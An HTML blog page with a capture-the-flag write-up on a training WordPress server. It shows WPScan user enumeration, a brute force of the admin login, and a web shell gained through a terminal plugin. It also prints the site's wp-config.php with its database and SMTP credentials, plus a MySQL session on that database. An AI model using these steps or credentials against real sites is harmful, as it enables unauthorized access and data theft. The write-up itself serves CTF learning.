<!DOCTYPE html>
<html class="theme-next mist use-motion" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/assets/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/assets/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/assets/css/main.css?v=5.1.1" rel="stylesheet" type="text/css">


  <meta name="keywords" content="nihwk-training-2018,write-up,web,wordpress,">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1">
















<meta name="description" content="">
<meta name="keywords" content="nihwk-training-2018, write-up, web, wordpress">
<meta property="og:type" content="article">
<meta property="og:title" content="NIHWK training CTF - WordPress">
<meta property="og:url" content="/2018/08/22/NIHWK-Write-Up-Wordpress/">
<meta property="og:site_name" content="Pxmme">
<meta property="og:description" content="">
<meta property="og:locale" content="en">
<meta property="og:image" content="/imgs/wphome.png">
<meta property="og:image" content="/imgs/wpshop.png">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="NIHWK training CTF - WordPress">
<meta name="twitter:description" content="">
<meta name="twitter:image" content="/imgs/wphome.png">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="">





  <title>NIHWK training CTF - WordPress | Pxmme</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-124206072-1', 'auto');
  ga('send', 'pageview');
</script>













</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Pxmme</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Please take off your shoes.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

<div id="posts" class="posts-expand">
  
  

  

  
  
  

  <article class="post post-type- " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="/2018/08/22/NIHWK-Write-Up-Wordpress/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Pxmme">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="assets/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pxmme">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
          
          
            NIHWK training CTF - WordPress
          
        </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-08-22T07:00:00+02:00">
                2018-08-22
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          
            
                <div class="post-description">
                    
                </div>
            
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        
  
  












  <!--more-->

<h2 id="challenge">Challenge</h2>

<p>Can you find the flag inside server? http://jordpress.herokuapp.com/</p>

<p>[1200 points]</p>

<p><em>Written by Lattice</em></p>

<h2 id="initial-thoughts">Initial thoughts</h2>

<p>I wanted to do some of the training challenges before the actual CTF coming up this week-end. I did some of the easy ones out of boredom and then looked at this WordPress one. What striked me was that it only had 1 solve and still gave a good amount of points compared to the others. I wondered if it was really hard, or if people just weren’t that much into WordPress exploitation. Anyway, I dived in, seeing in this challenge a nice way to spend my evening at the hotel I was staying in.</p>

<h2 id="exploitation">Exploitation</h2>

<p><img src="/imgs/wphome.png" alt="Homepage" class="img-responsive"></p>

<p>Here we are. A home page with some articles, unfortunately half-written in a language I do not speak.</p>

<p>I looked around, tried some common logins at wp-login.php (such as “admin, admin” or “admin, password”…) but nothing worked.</p>

<p>I figured I needed to start using tools, so I fired up Kali and went for WPSCAN.</p>

<p><code class="highlighter-rouge">wpscan --url http://jordpress.herokuapp.com/</code> and <code class="highlighter-rouge">wpscan --url http://jordpress.herokuapp.com/ --enumerate p</code> didn’t gave me much. WordPress’ version was outdated, so a bunch of CVEs poped out, one for getting RCE. I tried it, no luck : it failed.</p>

<p>I decided to go back to WPSCAN and try something different, a little easier than exploiting a CVE, and see what I could get.</p>

<p>Since I do not speak mandarin, chinese or whatever this was, I couldn’t really read posts and see what was said and who posted it. So I asked my bilingual friend WPSCAN to do it for me by enumerating users :</p>

<div class="highlighter-rouge">
<div class="highlight"><table style="margin: 0px"><tbody><tr>
<td class="gutter"><pre>1<br>2<br>3<br>4<br>5<br>6<br>7<br>8<br>9<br>10</pre></td>
<td class="code"><pre class="highlight"><code>wpscan --url http://jordpress.herokuapp.com/ --enumerate u

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+---------+
    | Id | Login | Name    |
    +----+-------+---------+
    | 1  | admin | 404 Not |
    +----+-------+---------+
[!] Default first WordPress username 'admin' is still used
</code></pre></td>
</tr></tbody></table></div>
</div>

<p>That’s a start. “admin” is still in use, and seems to be the only one… I guess that shall be the entry point.</p>

<p>Let’s see if we can do something dumb, by bruteforcing the log-in, since XMLRPC was available :</p>

<div class="highlighter-rouge">
<div class="highlight"><table style="margin: 0px"><tbody><tr>
<td class="gutter"><pre>1<br>2<br>3<br>4<br>5<br>6<br>7<br>8<br>9<br>10<br>11</pre></td>
<td class="code"><pre class="highlight"><code>wpscan --url http://jordpress.herokuapp.com/ --wordlist /usr/share/wordlists/rockyou.txt --username admin

[+] Starting the password brute forcer
  [+] [SUCCESS] Login : admin Password : 12345678

  Brute Forcing 'admin' Time: 00:00:23
  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | admin |      | 12345678 |
  +----+-------+------+----------+
</code></pre></td>
</tr></tbody></table></div>
</div>

<p>Meeeh. Easier than I thought for this much points. But maybe I’m not done yet. Let’s log-in as admin and see what’s what.</p>

<p>Once logged in, I saw some plugins being installed but they were all up to date and not really exploitable (akismet…).</p>

<p>I started thinking about exploits that needed authentication as admin to get RCE, but then I remembered : this WordPress installation, unlike all the other ones I did on HackTheBox, was indeed connected to the world wide web.</p>

<p>I could just go for plugins’ shopping.</p>

<p><img src="/imgs/wpshop.png" alt="Shopping" class="img-responsive"></p>

<p>Searching for “shell”, I found this nice little guy called WPTerm. I then installed it and was able to get a shell, just like that, on the server as dyno user.</p>

<p>(Thanks to <a href="https://wordpress.org/plugins/wpterm/">Jerome Bruandet for this amazing plugin!</a>)</p>

<div class="highlighter-rouge">
<div class="highlight"><table style="margin: 0px"><tbody><tr>
<td class="gutter"><pre>1<br>2</pre></td>
<td class="code"><pre class="highlight"><code>u5412:/app $ id
uid=5412(u5412) gid=5412(dyno) groups=5412(dyno)
</code></pre></td>
</tr></tbody></table></div>
</div>

<p>Now comes the stupid part. I was so familiar with HTB’s kind of WordPress exploitation that I didn’t even think about taking a breath after I landed that shell.</p>

<p>I immediately started looking into wp-config.php to gather some credentials.</p>

<figure class="highlight"><pre><code class="language-php" data-lang="php"><table style="border-spacing: 0"><tbody><tr>
<td class="gutter gl" style="text-align: right"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92</pre></td>
<td class="code"><pre><span class="cp">&lt;?php</span>
<span class="sd">/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */</span>

<span class="c1">// ** MySQL settings - You can get this info from your web host ** //
</span><span class="sd">/** The name of the database for WordPress */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'DB_NAME'</span><span class="p">,</span> <span class="s1">'ado77oc5a8ntg8qf'</span><span class="p">);</span>

<span class="sd">/** MySQL database username */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'DB_USER'</span><span class="p">,</span> <span class="s1">'b7gqhve5j2viqqwd'</span><span class="p">);</span>

<span class="sd">/** MySQL database password */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'DB_PASSWORD'</span><span class="p">,</span> <span class="s1">'eyekawepi48wol7h'</span><span class="p">);</span>

<span class="sd">/** MySQL hostname */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'DB_HOST'</span><span class="p">,</span> <span class="s1">'y06qcehxdtkegbeb.cbetxkdyhwsb.us-east-1.rds.amazonaws.com'</span><span class="p">);</span>

<span class="sd">/** Database Charset to use in creating database tables. */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'DB_CHARSET'</span><span class="p">,</span> <span class="s1">'utf8'</span><span class="p">);</span>

<span class="sd">/** The Database Collate type. Don't change this if in doubt. */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'DB_COLLATE'</span><span class="p">,</span> <span class="s1">''</span><span class="p">);</span>

<span class="nb">define</span><span class="p">(</span><span class="s1">'WPMS_ON'</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'WPMS_SMTP_PASS'</span><span class="p">,</span> <span class="s1">'Ynnhoj!@34'</span><span class="p">);</span>

<span class="sd">/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'AUTH_KEY'</span><span class="p">,</span>         <span class="s1">'put your unique phrase here'</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'SECURE_AUTH_KEY'</span><span class="p">,</span>  <span class="s1">'put your unique phrase here'</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'LOGGED_IN_KEY'</span><span class="p">,</span>    <span class="s1">'put your unique phrase here'</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'NONCE_KEY'</span><span class="p">,</span>        <span class="s1">'put your unique phrase here'</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'AUTH_SALT'</span><span class="p">,</span>        <span class="s1">'put your unique phrase here'</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'SECURE_AUTH_SALT'</span><span class="p">,</span> <span class="s1">'put your unique phrase here'</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'LOGGED_IN_SALT'</span><span class="p">,</span>   <span class="s1">'put your unique phrase here'</span><span class="p">);</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'NONCE_SALT'</span><span class="p">,</span>       <span class="s1">'put your unique phrase here'</span><span class="p">);</span>

<span class="sd">/**#@-*/</span>

<span class="sd">/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */</span>
<span class="nv">$table_prefix</span>  <span class="o">=</span> <span class="s1">'wp_'</span><span class="p">;</span>

<span class="sd">/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */</span>
<span class="nb">define</span><span class="p">(</span><span class="s1">'WP_DEBUG'</span><span class="p">,</span> <span class="kc">false</span><span class="p">);</span>

<span class="cm">/* That's all, stop editing! Happy blogging. */</span>

<span class="sd">/** Absolute path to the WordPress directory. */</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nb">defined</span><span class="p">(</span><span class="s1">'ABSPATH'</span><span class="p">)</span> <span class="p">)</span>
    <span class="nb">define</span><span class="p">(</span><span class="s1">'ABSPATH'</span><span class="p">,</span> <span class="nb">dirname</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">)</span> <span class="o">.</span> <span class="s1">'/'</span><span class="p">);</span>

<span class="sd">/** Sets up WordPress vars and included files. */</span>
<span class="k">require_once</span><span class="p">(</span><span class="nx">ABSPATH</span> <span class="o">.</span> <span class="s1">'wp-settings.php'</span><span class="p">);</span><span class="w">
</span></pre></td>
</tr></tbody></table></code></pre></figure>

<p>And I got excited. I thought “that’s it, the flag must be inside the MySQL db, or then it must have something to do with the WPMS_SMTP_PASS”. Oh boi, was I overthinking this.</p>

<p>Anyway, I connected to the remote MySQL DB and started looking.</p>

<div class="highlighter-rouge">
<div class="highlight"><table style="margin: 0px"><tbody><tr>
<td class="gutter"><pre>1<br>2<br>3<br>4<br>5<br>6<br>7<br>8<br>9<br>10<br>11<br>12<br>13<br>14<br>15<br>16<br>17<br>18<br>19<br>20<br>21<br>22<br>23<br>24<br>25<br>26<br>27<br>28<br>29<br>30<br>31<br>32<br>33<br>34<br>35<br>36<br>37<br>38<br>39<br>40<br>41<br>42<br>43<br>44<br>45<br>46<br>47<br>48<br>49<br>50<br>51<br>52<br>53<br>54</pre></td>
<td class="code"><pre class="highlight"><code>~# mysql -u b7gqhve5j2viqqwd -p -h y06qcehxdtkegbeb.cbetxkdyhwsb.us-east-1.rds.amazonaws.com -D ado77oc5a8ntg8qf
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 6144783
Server version: 5.7.19-log MySQL Community Server (GPL)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [ado77oc5a8ntg8qf]&gt; show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ado77oc5a8ntg8qf   |
+--------------------+
2 rows in set (0.16 sec)

MySQL [ado77oc5a8ntg8qf]&gt; use ado77oc5a8ntg8qf;
Database changed
MySQL [ado77oc5a8ntg8qf]&gt; show tables;
+----------------------------+
| Tables_in_ado77oc5a8ntg8qf |
+----------------------------+
| wp_bp_activity             |
| wp_bp_activity_meta        |
| wp_bp_notifications        |
| wp_bp_notifications_meta   |
| wp_bp_xprofile_data        |
| wp_bp_xprofile_fields      |
| wp_bp_xprofile_groups      |
| wp_bp_xprofile_meta        |
| wp_commentmeta             |
| wp_comments                |
| wp_links                   |
| wp_options                 |
| wp_postmeta                |
| wp_posts                   |
| wp_signups                 |
| wp_term_relationships      |
| wp_term_taxonomy           |
| wp_termmeta                |
| wp_terms                   |
| wp_usermeta                |
| wp_users                   |
| wp_xyz_ips_short_code      |
+----------------------------+
22 rows in set (0.13 sec)

MySQL [ado77oc5a8ntg8qf]&gt;
</code></pre></td>
</tr></tbody></table></div>
</div>

<p>And I looked, and I looked, and I looked… It looked at posts revisions, at users deletions, at posts’ meta… Nothing to be found.</p>

<p>I went and looked around in /etc. I looked at ssh configuration. I looked at cronjobs. I looked at passwd, I tried some dumb shit like sudoing stuff.</p>

<p>I started to think about the SMTP password then.</p>

<p>With my bladder full, and my energy low, I decided to take a break to unburden myself. It was during midstream that it came to me, an insight from the pee-gods.</p>

<p><em>Wait a minute… I didn’t even fucking look around! As soon as I landed this shell, I started doing wp-config.php and MySQL enumeration without even doing a proper ls -al in the landing dir!</em></p>

<p>Long story short, there was indeed a stupid dir in /app, with the flag in it.</p>

<div class="highlighter-rouge">
<div class="highlight"><table style="margin: 0px"><tbody><tr>
<td class="gutter"><pre>1<br>2</pre></td>
<td class="code"><pre class="highlight"><code>u5412:/app/123213fda9fd7a089fd8afdsafdsaffdafda $ cat flag
flag{wordpress_1s_vulnerable!!!!!!!}
</code></pre></td>
</tr></tbody></table></div>
</div>

<p>Flag was : <code class="highlighter-rouge">flag{wordpress_1s_vulnerable!!!!!!!}</code></p>

<h2 id="after-thoughts">After thoughts</h2>

<p>Before starting to overthink a challenge, ALWAYS go with the basics. Always assume the actions you need to take in order to get the flag are <strong>dumb</strong>. If nothing dumb works, you can start thinking.</p>

<p>All in all, it’s an interesting, even if basic, WordPress exploitation challenge. I was amazed to see that we were only 2 guys to have solved it, when other web challenges, which gave much more points, had so many more solves.</p>

<p>I guess, as I said earlier, that people are just not into WordPress’ exploitation anymore. <img class="emoji" title=":smile:" alt=":smile:" src="https://assets-cdn.github.com/images/icons/emoji/unicode/1f604.png" height="20" width="20" align="absmiddle"></p>


      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            
            <a href="/tag/#/nihwk-training-2018" rel="tag"># nihwk-training-2018</a>
          
            
            <a href="/tag/#/write-up" rel="tag"># write-up</a>
          
            
            <a href="/tag/#/web" rel="tag"># web</a>
          
            
            <a href="/tag/#/wordpress" rel="tag"># wordpress</a>
          
        </div>
      

      
      
      
      
      

      
      
        <div class="post-nav" id="post-nav-id">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/22/TJCTF-Programmable-Hyperlinked-Pasta/" rel="next" title="TJCTF - Programmable Hyperlinked Pasta">
                <i class="fa fa-chevron-left"></i> TJCTF - Programmable Hyperlinked Pasta
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/08/21/TJCTF-Write-Up-Python-Reversing/" rel="prev" title="TJCTF - Python Reversing">
                TJCTF - Python Reversing <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      
      

      
    </footer>
  </article>

  <div class="post-spread">
    
  </div>
</div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          

  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        
        
        







      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/assets/images/avatar.gif" alt="Pxmme">
          <p class="site-author-name" itemprop="name">Pxmme</p>
           
              <p class="site-description motion-element" itemprop="description">Cybersec enthusiast.</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="">
                <span class="site-state-item-count">15</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        
        
        

        <div class="links-of-author motion-element">
          
            
              
              
              <span class="links-of-author-item">
                <a href="https://github.com/pxmme" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://twitter.com/prxph3t" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://www.hackthebox.eu/profile/20490" target="_blank" title="HackTheBox">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  HackTheBox
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            








            
              <div class="post-toc-content">
    <ol class="nav">
      <li class="nav-item nav-level-2"> <a class="nav-link" href="#challenge"> <span class="nav-number">1</span> <span class="nav-text">Challenge</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#initial-thoughts"> <span class="nav-number">2</span> <span class="nav-text">Initial thoughts</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#exploitation"> <span class="nav-number">3</span> <span class="nav-text">Exploitation</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#after-thoughts"> <span class="nav-number">4</span> <span class="nav-text">After thoughts</span> </a> </li>
    </ol>
  </div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>

        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  
  © 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Pxmme</span>
</div>



        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>





















  
   
  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery/index.js?v=2.1.3"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/assets/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/assets/js/src/motion.js?v=5.1.1"></script>



  
  

  <script type="text/javascript" src="/assets/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/assets/js/src/post-details.js?v=5.1.1"></script>


  


  <script type="text/javascript" src="/assets/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  











  




  

    

  





  






  

  

  
  


  

  

  

</body>
</html>
